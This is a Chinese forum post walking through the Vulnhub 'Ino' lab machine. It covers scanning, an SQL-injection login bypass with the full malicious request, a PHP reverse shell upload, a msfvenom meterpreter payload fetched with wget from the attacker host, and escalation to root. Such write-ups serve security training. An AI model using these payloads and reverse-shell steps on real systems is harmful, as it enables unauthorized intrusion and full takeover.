马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
Ino
识别目标主机IP地址
- ─(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
- 192.168.56.100 08:00:27:86:38:75 1 60 PCS Systemtechnik GmbH
- 192.168.56.253 08:00:27:f5:7e:8f 1 60 PCS Systemtechnik GmbH
NMAP扫描
- ──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 00:34 EDT
- Nmap scan report for localhost (192.168.56.253)
- Host is up (0.00034s latency).
- Not shown: 65533 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
- | ssh-hostkey:
- | 2048 deb52389bb9fd41ab50453d0b75cb03f (RSA)
- | 256 160914eab9fa17e945395e3bb4fd110a (ECDSA)
- |_ 256 9f665e71b9125ded705a4f5a8d0d65d5 (ED25519)
- 80/tcp open http Apache httpd 2.4.38 ((Debian))
- |_http-server-header: Apache/2.4.38 (Debian)
- MAC Address: 08:00:27:F5:7E:8F (Oracle VirtualBox virtual NIC)
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds
获得Shell
访问80端口,从返回的页面看CMS为Lot Reservation Management System- ──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ searchsploit Lot Reservation
- -------------------------------------------------------------------------------------------- ---------------------------------
- Exploit Title | Path
- -------------------------------------------------------------------------------------------- ---------------------------------
- Lot Reservation Management System 1.0 - Authentication Bypass | php/webapps/48934.txt
- Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored) | php/webapps/48935.txt
- -------------------------------------------------------------------------------------------- ---------------------------------
- Shellcodes: No Results
- ┌──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ nikto -h http://192.168.56.253
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.253
- + Target Hostname: 192.168.56.253
- + Target Port: 80
- + Start Time: 2023-04-16 00:40:09 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.4.38 (Debian)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: /lot/
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
- + Scan terminated: 20 error(s) and 3 item(s) reported on remote host
- + End Time: 2023-04-16 00:41:00 (GMT-4) (51 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- *********************************************************************
- Portions of the server's headers (Apache/2.4.38) are not in
- the Nikto 2.1.6 database or are newer than the known string. Would you like
- to submit this information (*no server specific data*) to CIRT.net
- for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
用Gobuster工具无法识别目录:- ──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ gobuster dir -u http://192.168.56.253/lot/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
- ===============================================================
- Gobuster v3.3
- by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
- ===============================================================
- [+] Url: http://192.168.56.253/lot/
- [+] Method: GET
- [+] Threads: 10
- [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- [+] Negative Status codes: 404
- [+] User Agent: gobuster/3.3
- [+] Extensions: php,html,js,sh,txt
- [+] Timeout: 10s
- ===============================================================
- 2023/04/16 00:46:35 Starting gobuster in directory enumeration mode
- ===============================================================
- Error: error on running gobuster: unable to connect to http://192.168.56.253/lot/: Get "http://192.168.56.253/lot/": dial tcp 192.168.56.253:80: connect: connection refused
- ┌──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ searchsploit -m php/webapps/48934.txt
- Exploit: Lot Reservation Management System 1.0 - Authentication Bypass
- URL: https://www.exploit-db.com/exploits/48934
- Path: /usr/share/exploitdb/exploits/php/webapps/48934.txt
- Codes: N/A
- Verified: True
- File Type: ASCII text
- Copied to: /home/kali/Vulnhub/Ino/48934.txt
-
- ┌──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ cat 48934.txt
- #Exploit Title: lot reservation management system 1.0 - Authentication Bypass
- #Date: 2020-10-22
- #Exploit Author: Ankita Pal
- #Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
- #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
- #Version: V1.0
- #Tested on: Windows 10 + xampp v3.2.4
- Proof of Concept:::
- Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php
- Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password.
- Malicious Request:::
- POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
- Host: localhost:8081
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Accept: */*
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Content-Length: 71
- Origin: http://localhost:8081
- Connection: close
- Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
- Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
- username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B
- You will be login as admin of the application.
- http://192.168.56.253/lot/admin/
密码处: admin' or 1=1 --
可以绕过管理后台。
<img alt="" loading="lazy">
在System Settings,可以上传shell.php文件
从而在Kali Linux上得到了目标主机反弹回来的shell- ┌──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ sudo nc -nlvp 5555
- [sudo] password for kali:
- listening on [any] 5555 ...
- connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 40798
- Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
- 05:59:36 up 26 min, 0 users, load average: 0.00, 0.21, 0.60
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- /bin/sh: 0: can't access tty; job control turned off
- $ which python
- /usr/bin/python
- $ python -c 'import pty;pty.spawn("/bin/bash")'
- www-data@ino:/$ cd /home
- cd /home
- www-data@ino:/home$ ls -alh
- ls -alh
- total 12K
- drwxr-xr-x 3 root root 4.0K Oct 10 2020 .
- drwxr-xr-x 18 root root 4.0K Oct 27 2020 ..
- drwxr-xr-x 2 ppp ppp 4.0K Dec 5 2020 ppp
- www-data@ino:/home$ cd ppp
- cd ppp
- www-data@ino:/home/ppp$ ls -alh
- ls -alh
- total 24K
- drwxr-xr-x 2 ppp ppp 4.0K Dec 5 2020 .
- drwxr-xr-x 3 root root 4.0K Oct 10 2020 ..
- lrwxrwxrwx 1 root root 9 Dec 5 2020 .bash_history -> /dev/null
- -rw-r--r-- 1 ppp ppp 220 Oct 10 2020 .bash_logout
- -rw-r--r-- 1 ppp ppp 3.5K Oct 10 2020 .bashrc
- -rw-r--r-- 1 ppp ppp 807 Oct 10 2020 .profile
- -rw-r--r-- 1 ppp ppp 33 Dec 5 2020 local.txt
- www-data@ino:/home/ppp$ cat local.txt
- cat local.txt
- f29cea45f473ebfa834885c4ff70ec1a
提权
- ┌──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
- [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
- [-] No arch selected, selecting arch: x86 from the payload
- No encoder specified, outputting raw payload
- Payload size: 123 bytes
- Final size of elf file: 207 bytes
- Saved as: escalate.elf
-
-
- ┌──(kali㉿kali)-[~/Vulnhub/Ino]
- └─$ python -m http.server
- Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
- www-data@ino:/tmp$ wget http://192.168.56.206:8000/escalate.elf
- wget http://192.168.56.206:8000/escalate.elf
- --2023-04-16 06:06:32-- http://192.168.56.206:8000/escalate.elf
- Connecting to 192.168.56.206:8000... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 207 [application/octet-stream]
- Saving to: 'escalate.elf'
- escalate.elf 100%[===================>] 207 --.-KB/s in 0s
- 2023-04-16 06:06:32 (65.6 MB/s) - 'escalate.elf' saved [207/207]
- www-data@ino:/tmp$ chmod +x escalate.elf
- chmod +x escalate.elf
- msf6 > use exploit/multi/handler
- [*] Using configured payload generic/shell_reverse_tcp
- msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
- payload => linux/x86/meterpreter/reverse_tcp
- msf6 exploit(multi/handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (linux/x86/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST yes The listen address (an interface may be specified)
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- View the full module info with the info, or info -d command.
- msf6 exploit(multi/handler) > set LHOST 192.168.56.206
- LHOST => 192.168.56.206
- msf6 exploit(multi/handler) > set LPORT 6666
- LPORT => 6666
- msf6 exploit(multi/handler) > run
从而得到meterpreter- msf6 exploit(multi/handler) > run
- [*] Started reverse TCP handler on 192.168.56.206:6666
- [*] Sending stage (1017704 bytes) to 192.168.56.253
- [*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.253:44636) at 2023-04-16 01:07:39 -0400
- meterpreter > background
- [*] Backgrounding session 1...
- msf6 exploit(multi/handler) > search suggester
- Matching Modules
- ================
- # Name Disclosure Date Rank Check Description
- - ---- --------------- ---- ----- -----------
- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
- [*] 192.168.56.253 - Valid modules for session 1:
- ============================
- # Name Potentially Vulnerable? Check Result
- - ---- ----------------------- ------------
- 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
- 2 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
- 3 exploit/linux/local/su_login Yes The target appears to be vulnerable.
- meterpreter > shell
- Process 1409 created.
- Channel 1 created.
- id
- uid=0(root) gid=0(root) groups=0(root),33(www-data)
- cd /root
- ls -alh
- total 28K
- drwx------ 3 root root 4.0K Dec 5 2020 .
- drwxr-xr-x 18 root root 4.0K Oct 27 2020 ..
- lrwxrwxrwx 1 root root 9 Dec 5 2020 .bash_history -> /dev/null
- -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
- -rw------- 1 root root 3.5K Oct 26 2020 .mysql_history
- -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
- drwx------ 2 root root 4.0K Oct 27 2020 .ssh
- -rw------- 1 root root 33 Dec 5 2020 proof.txt
- cat proof.txt
- 21bae0a12690199cde7a65bff57723a5
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
